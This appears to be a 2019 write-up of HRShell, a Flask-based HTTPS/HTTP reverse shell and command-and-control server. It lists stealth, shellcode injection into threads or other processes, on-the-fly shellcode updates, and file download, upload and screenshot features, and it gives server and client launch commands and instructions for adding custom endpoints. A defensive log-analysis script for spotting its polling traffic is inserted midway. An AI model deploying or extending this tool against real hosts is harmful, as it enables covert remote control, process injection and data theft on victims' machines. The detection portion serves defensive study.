HRShell – An Advanced HTTPS/HTTP Reverse Shell Built With Flask

October 3, 2019

HRShell is an HTTPS/HTTP reverse shell built with Flask. It is an advanced C2 server with many features and capabilities. It is compatible with Python 3.x and has been successfully tested on:

  • Linux: Ubuntu 18.04 LTS, Kali Linux 2019.3
  • macOS Mojave
  • Windows 7/10

HRShell Features

  • It’s stealthy
  • TLS support 🔑
    • Either using on-the-fly certificates or
    • By specifying a cert/key pair (more details below…)
  • Shellcode injection 💉 (more details below…)
    • Either shellcode injection in a thread of the current running process
      • Platforms supported so far:
        • Windows x86
        • Unix x86
        • Unix x64
    • or shellcode injection into another process (migrate <PID>) by specifying its PID
      • Platforms supported so far:
        • Windows x86
        • Windows x64
  • Shellcode can be set/modified on the fly from the server (more details below…)
  • Proxy support on client.
  • Directory navigation (cd command and variants).
  • download/upload/screenshot commands available.
  • Pipelining (|) & chained commands (;) are supported
  • Support for every non-interactive (like gdb, top etc…) command
  • Server is both HTTP & HTTPS capable.
  • It comes with two built-in servers 🌐 so far, the Flask built-in server and tornado-WSGI, and is also compatible with production servers such as gunicorn and Nginx.
  • Both server.py and client.py are easily extensible.
  • Since most of the functionality comes from the server's endpoint design, it is easy to write a client in any other language, e.g. Java, Go, etc.


Details


TLS 🔑

Server-side: Unless the --http option is specified, server.py uses HTTPS by default with on-the-fly certificates, which are a built-in Flask feature. If -s tornado is specified and the server should use TLS, a --cert and a --key option must be given, like so:

python server.py -s tornado --cert /path/cert.pem --key /path/key.pem

Either “real” certificates can be used, or a cert/key pair can be generated with openssl like so:

openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365

A cert/key pair can also be used with the flask-server:

python server.py --cert /path/cert.pem --key /path/key.pem

⚠️ If the server is using TLS, then by design the client can’t use http://... to connect to the server, but must explicitly use https instead.

Client-side: By default client’s SSL verification is disabled, unless:

  • either the --cert parameter is specified e.g.:
    python client.py -s https://192.168.10.7:5000 --cert /path/cert.pem
    
  • or the CERT variable is set beforehand to a valid certificate (instead of its default value None), e.g.:
    CERT = """
    -----BEGIN CERTIFICATE-----
    MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV
    BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD
    VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa
    ...
    -----END CERTIFICATE-----
    """

    In this case client.py will attempt to create a hidden .cert.pem file on the fly and will use that instead.


HRShell Shellcode injection 💉

There are two “modes” of shellcode injection using the two following commands respectively:

  1. migrate <PID>: injects the shellcode into the memory space of another process, identified by its PID. For now this command can only be used on Windows x86/x64 platforms.
  2. inject shellcode: creates a new thread in the current process and injects the shellcode into that thread's memory space, so the HTTP(S) shell itself is not affected by the injection. Supported platforms are Unix x86/x64 and Windows x86.

Notes
  • When injecting into another process, process permissions play a very important role: injection into an arbitrary process is not always possible because the client may lack the appropriate privileges for the target.

HRShell Set/Modify shellcode

There are two ways you can specify/set what type of shellcode you want the client to execute:

  • Either pre-set shellcode variable on client.py script to be a valid shellcode or
  • Use the set shellcode <shellcode-id> command to do that on the fly. With this command you can update your shellcode on client-side from server-side as many times as you like!

hrshell

The first way is straightforward. To use the second and more convenient way (which also lets you modify an already specified shellcode), edit the shellcodes/utils.py script so that it contains the shellcode(s) of your choice. The script contains an example of how to do that.

💡 You can modify/update shellcodes/utils.py script even after you’ve launched server.py as many times as you want, since server.py will dynamically use the most updated/recent version. In this way you can set & modify shellcodes on the go…

Available commands:

Special commands:


Any other command is supported as long as it is not interactive (e.g. gdb, top, etc.). Running python server.py -h or python client.py -h lists the available server and client arguments.

Note: If a client is connected to the server and we want to terminate the server, we have to close the connection with the exit command before pressing CTRL+C.


Creating custom commands

Client-side:

In order to create a custom command, generally:

  • a regex rule that describes the command must be defined on client-side
  • the code to handle that command must be added as an elif statement also on client-side.

Server-side:

If the command demands the existence of a new-endpoint on server-side, then:

  • to define the endpoint (redirect and url_for come from flask):
    @app.route('/custom_endpoint/<arg>')
    def custom_endpoint(arg):
        """
        documentation if needed
        """
        ...
        return ...
  • then edit handleGET() to redirect the client to that endpoint:
    @app.route('/')
    def handleGET():
        ...
        return redirect(url_for('custom_endpoint', arg=...))
  • do the appropriate edits in handlePOST() to handle the presentation of the results.
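The endpoint design described above (the client polls GET /, the server answers with a redirect to a command endpoint, and the client POSTs the command output back) is also the request pattern a defender can hunt for in web-server access logs. The following is an added example and not code from HRShell or its author: it parses constructed Apache/Nginx combined-format log lines (the IPs, timestamps, paths and user agents are made up) and flags clients that repeatedly issue a redirected GET / followed within a few seconds by a POST. The endpoint name /custom_endpoint, the 5-second window and the three-cycle threshold are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Apache/Nginx "combined" log format (not real traffic).
# They model the flow described in the write-up: the client polls GET /, is
# redirected to a command endpoint, runs the command and POSTs the output back.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Oct/2019:12:00:00 +0000] "GET / HTTP/1.1" 302 0 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:00 +0000] "GET /custom_endpoint/whoami HTTP/1.1" 200 12 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:01 +0000] "POST / HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:05 +0000] "GET / HTTP/1.1" 302 0 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:05 +0000] "GET /custom_endpoint/ls HTTP/1.1" 200 40 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:06 +0000] "POST / HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:10 +0000] "GET / HTTP/1.1" 302 0 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:10 +0000] "GET /custom_endpoint/id HTTP/1.1" 200 20 "-" "python-requests/2.22.0"
10.0.0.5 - - [03/Oct/2019:12:00:11 +0000] "POST / HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
192.0.2.9 - - [03/Oct/2019:12:00:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Oct/2019:12:00:09 +0000] "GET /static/app.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"
192.0.2.9 - - [03/Oct/2019:12:00:40 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# One combined-format request line: ip ident user [timestamp] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def parse_log(text):
    """Parse combined-format lines into event dicts, sorted by timestamp (stable)."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip anything that is not a well-formed request line
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
            "ua": m["ua"],
        })
    events.sort(key=lambda e: e["ts"])
    return events


def redirect_post_cycles(events, window_s=5.0):
    """Per client IP, return the start times of every 'GET / -> redirect -> POST' cycle.

    A cycle is counted when a redirected GET / from a client is followed by a
    POST from the same client within window_s seconds.
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    cycles = {}
    for ip, evs in by_ip.items():
        starts = []
        pending = None  # timestamp of the latest redirected poll not yet matched by a POST
        for e in evs:
            if e["method"] == "GET" and e["path"] == "/" and e["status"] in REDIRECT_STATUSES:
                pending = e["ts"]
            elif e["method"] == "POST" and pending is not None:
                if (e["ts"] - pending).total_seconds() <= window_s:
                    starts.append(pending)
                pending = None
        if starts:
            cycles[ip] = starts
    return cycles


def flag_clients(events, min_cycles=3, window_s=5.0):
    """Flag clients with at least min_cycles poll/redirect/POST cycles; report cadence and UAs."""
    flagged = {}
    for ip, starts in redirect_post_cycles(events, window_s).items():
        if len(starts) < min_cycles:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        flagged[ip] = {
            "cycles": len(starts),
            "mean_interval_s": sum(gaps) / len(gaps) if gaps else None,
            "user_agents": sorted({e["ua"] for e in events if e["ip"] == ip}),
        }
    return flagged


if __name__ == "__main__":
    for ip, info in flag_clients(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {info['cycles']} cycles, mean interval {info['mean_interval_s']}s, UA {info['user_agents']}")
```

In the constructed sample the regular 5-second cadence and the python-requests user agent are what separate the polling client from the browser at 192.0.2.9, which also hits / and later POSTs but never gets a redirect from /. On real logs the window and threshold need tuning, and a single match is a lead for further triage rather than proof of a reverse shell.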

Script-Arguments

Both scripts (server.py and client.py) can be customized through arguments:

server.py

$ python server.py -h
usage: server.py [-h] [-s] [-c] [--host] [-p] [--http] [--cert] [--key]

server.py: An HTTP(S) reverse-shell server with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify the HTTP(S) server to use (default: flask).
  -c , --client   Accept connections only from the specified client/IP.
  --host          Specify the IP to use (default: 0.0.0.0).
  -p , --port     Specify a port to use (default: 5000).
  --http          Disable TLS and use HTTP instead.
  --cert          Specify a certificate to use (default: None).
  --key           Specify the corresponding private key to use (default: None).

client.py

$ python client.py -h
usage: client.py [-h] [-s] [-c] [-p]

client.py: An HTTP(S) client with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify an HTTP(S) server to connect to.
  -c , --cert     Specify a certificate to use.
  -p , --proxy    Specify a proxy to use [form: host:port]

📦 Requirements:

To install the server-requirements:

pip install -r requirements.txt --upgrade --user
